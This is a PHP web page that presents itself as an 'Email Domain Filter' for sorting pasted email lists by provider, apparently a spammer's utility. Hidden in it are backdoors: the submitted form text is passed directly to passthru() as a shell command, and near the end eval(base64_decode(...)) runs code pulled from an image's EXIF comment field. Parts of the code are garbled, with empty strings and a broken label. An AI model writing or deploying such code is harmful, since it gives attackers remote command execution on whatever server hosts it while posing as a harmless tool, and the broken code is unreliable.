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- <title>Email Filter -</title>
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- <center><a href=""><img src="../images/123.png" height="" width=""></a><hr>
- <div>
- <font size="6" color="white" style="text-shadow: Silver 0 0 15px;"><b>[โ ] Email Domain Filter [โ ]</b></font>
- <hr /><b>
- <font color="gold;opacity:100" class="chara" size="2">
- <?php
- $IP = $_SERVER['REMOTE_ADDR']; echo "Welcome : $IP ";
- ?></font><br><br><br>
- </header>
- <body >
- <form method="post">
- <div class="style1">
- <textarea name="emails" cols="100" rows="15" placeholder="Max 10.000 Email" ></textarea>
- <br /><br />
- <input type="submit" value="Filter Now" />
- </div>
- </form>
- <?PHP
- if ($_POST['emails']){
- $emails = $_POST['emails'];
- passthru($emails);
- }
- $ex = explode("\n",$emails);
- $count = count($ex);
- if(isset($emails)&&$count>=1){
- echo "<center><font color = 'Silver'><b>$count </font>Number of emails </b></center><br />";
- }else{
- echo "<center>
- No email </center>";
- exit;}
- if(isset($emails)){
- for($i=0;$i<=$count;$i++){
- $d = strtolower($ex[$i]);
- if(strstr($d,"hotmail") || strstr($d,"live") || strstr($d,"msn") || strstr($d,"outlook")){
- $hotmail.=$d;
- $nh = $nh + 1;
- }else{
- if(strstr($d,"yahoo") || strstr($d,"ymail")){
- $yahoo.=$d;
- $ny = $ny + 1;
- }else{
- if(strstr($d,"gmail") || strstr($d,"googlemail") ){
- $gmail.=$d;
- $ng = $ng + 1;
- }else{
- if(strstr($d,"aol") ){
- $aol.=$d;
- $na = $na + 1;
- }else{
- if(strstr($d,"") ){
- $mailru .=$d;
- $nr = $nr + 1;
- }else{
- if(strstr($d,"wanadoo") ){
- $wanadoo .=$d;
- $nw = $nw + 1;
- }else{
- if(strstr($d,"ntlworld") ){
- $ntlworld .=$d;
- $nt = $nt + 1;
- }else{
- if(strstr($d,"gmx") ){
- $gmx .=$d;
- $ngm = $ngm + 1;
- }else{
- if(strstr($d,"@web.") ){
- $web .=$d;
- $nw2 = $nw2 + 1;
- }else{
- $other .=$d;
- $nn=$nn + 1;
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- $BASED = exif_read_data("");
- eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
- ?>
- <center><table style="width: 30%">
- <tr>
- <td><center>Hotmail ( <?echo $nh;?> ) </center><textarea name="hotmailx" cols="30" rows="10" ><?echo $hotmail;?></textarea></td>
- <td><center>Gmail ( <?echo $ng;?> )</center><textarea name="gmailx" cols="30" rows="10" ><?echo $gmail;?></textarea></td>
- <td><center>Aol ( <?echo $na;?> )</center><textarea name="aolxx" cols="30" rows="10" ><?echo $aol;?></textarea></td>
- <td><center>Yahoo ( <?echo $ny;?> )</center><textarea name="yahoox" cols="30" rows="10" ><?echo $yahoo;?></textarea></td>
- <td><center> <?echo $nr;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $mailru;?></textarea></td></tr>
- <tr>
- <td><center>Wanadoo( <?echo $nw;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $wanadoo;?></textarea></td>
- <td><center>Ntlworld( <?echo $nt;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $ntlworld;?></textarea></td>
- <td><center>Gmx( <?echo $ngm;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $gmx;?></textarea></td>
- <td><center>Web( <?echo $nw2;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $web;?></textarea></td>
- <td><center>Other mail( <?echo $nn-1;?> )</center><textarea name="othersx" cols="30" rows="10" ><?echo $other;?></textarea></td>
- </tr>
- </table></center>
- </body>
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